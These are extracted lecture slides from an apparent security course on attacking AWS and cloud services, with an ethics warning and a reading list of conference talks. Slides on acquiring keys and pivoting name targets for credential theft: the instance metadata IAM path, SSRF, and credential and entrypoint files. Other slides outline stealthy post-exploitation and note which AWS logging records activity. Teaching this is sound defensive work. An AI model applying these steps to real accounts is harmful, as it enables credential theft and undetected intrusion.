AWS & Cloud.… · 2018. 5. 9. · Dump AWS-metadata Local privesc (if you can be stealthy) Dump users & readable files Dump local services/network subnet Look for source repos Look

AWS & Cloud

Ext-Break ● Did anyone get xsscsp2?○ It was a hard one lol

Quite. Quite hard.

Xsscsp2 Solution poc redacted

Overview

● What is the cloud● Who is this 4chan?● Access Keys/Roles● Acquiring Keys● Pivoting● Microservices● Common Vulns

Note on ethics

● Everything here is p o s t e x p l o i t a t i o n ● Everything you do at this point is illegal if you don’t have explicit permission● Most bug bounties do not permit you to do things in this realm

○ Unless you ask nicely● This will get you a nice knock on the door from the AFP. ● This is purely theoretical knowledge. ● You may be examined on this.

What is the cloud

● You all already should know● Where we outsource the hosting of our * to a third party● They provide us * level of control over the stack.

Scales of Clouds

*aaS

● Differing levels of control● Differing methods of exploitation/persistence/pivoting.● Everyone does it differently.

Impact of *aaS

Who is this 4chan? (AWS)

● Grab bag of everything.● Anything of your service you can have it.

Things AWS has

Things most people care about

More things AWS has

More things we care about

● We discussed this last week● What are access keys?

Access Keys and Roles

Roles & Policies

● Roles delegate access to functions by services. ● Can have different permissions/access controls (policies)●

Sometimes super permissive.

More realistically restricted permissions

Summary

● AWS big. ● Cloud bigger.● Things need permissions● Access uses keys

Acquiring Keys

● 169.254.169.254/latest/meta-data/iam/info● SSRF● LFD -> /docker-entrypoint.sh /init.sh ~/.aws/credentials.json etc.etc.● Use some vulnerability● Leaked config files (config.json)

Pivoting/Post-Exploitation

● Why do we need to pivot.○ Poor security hygiene○ Breaching security boundaries. ○ Expand control○ Find internal sensitive resources

Wat do?

● If you’re on the host○ Dump AWS-metadata○ Local privesc (if you can be stealthy)○ Dump users & readable files○ Dump local services/network subnet○ Look for source repos○ Look for private S3 buckets.

Becareful, it’s dangerous out there

● Be careful of logging○ AWS LogWatch/Cloudtrail○ Logs all activity○ Logs all errors○ Logs all logins. ○ (Depending on configuration)

https://www.blackhat.com/docs/us-16/materials/us-16-Amiga-Account-Jumping-Post-Infection-Persist

ency-And-Lateral-Movement-In-AWS-wp.pdf

Threat Modelling

● If you’re attacking Netflix vs attacking Yahoo.com○ One has really good security posture○ One has legacy code from the 90s○ Who is going to have better logging and infrastructure.

Bleeding Edge

● Microservices○

Scales of Clouds

*aaS

● You only provide a function● It runs it in the instance only as long as the function runs● After that everything is deleted.

Serverless/Lambda model

Stolen Slides

Exploitation

● Exfil is easy. You can get info out.

Extra reading

● https://www.blackhat.com/docs/us-16/materials/us-16-Amiga-Account-Jumping-Post-Infection-Persistency-And-Lateral-Movement-In-AWS-wp.pdf● Pivoting in AWS - https://blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf● Serverless Runtime - https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes-wp.pdf● Slide deck for notes - https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdf ● Offensive Security -

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-

Security.pdf

● Post compromise AWS - https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39● AWS Cloud Recon ( A bit basic ) -

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf

● GREAT TALK ON MICROSERVICE EXPLOITATION - https://www.youtube.com/watch?v=YZ058hmLuv0
https://www.blackhat.com/docs/us-16/materials/us-16-Amiga-Account-Jumping-Post-Infection-Persistency-And-Lateral-Movement-In-AWS-wp.pdfhttps://blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdfhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes-wp.pdfhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdfhttps://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdfhttps://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdfhttps://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdfhttps://www.youtube.com/watch?v=YZ058hmLuv0

Documents

AWS & Cloud.… · 2018. 5. 9. · Dump AWS-metadata Local privesc (if you can be stealthy) Dump users & readable files Dump local services/network subnet Look for source repos Look